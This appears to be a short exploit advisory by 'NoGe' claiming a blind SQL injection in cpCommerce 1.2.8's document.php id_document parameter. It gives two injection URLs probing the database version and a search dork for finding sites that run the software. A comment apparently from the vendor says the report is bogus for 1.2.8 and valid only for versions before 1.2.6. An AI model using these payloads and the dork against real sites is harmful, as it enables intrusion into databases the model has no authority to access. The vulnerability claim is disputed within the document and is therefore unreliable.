cpCommerce 1.2.8 Blind SQL Injection Vuln

[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability

Software : cpC0mmerce version 1.2.8
Vendor : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author : NoGe

[o] Vulnerable file

[o] Exploit
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5

[o] Dork
"Powered by cpCommerce"

One Response so far.

  1. cpradio says:

    This is bogus. I have tested it and that value is being properly sanitized. I would check your setup and your source you have downloaded. This would be a valid vulnerability for version prior to 1.2.6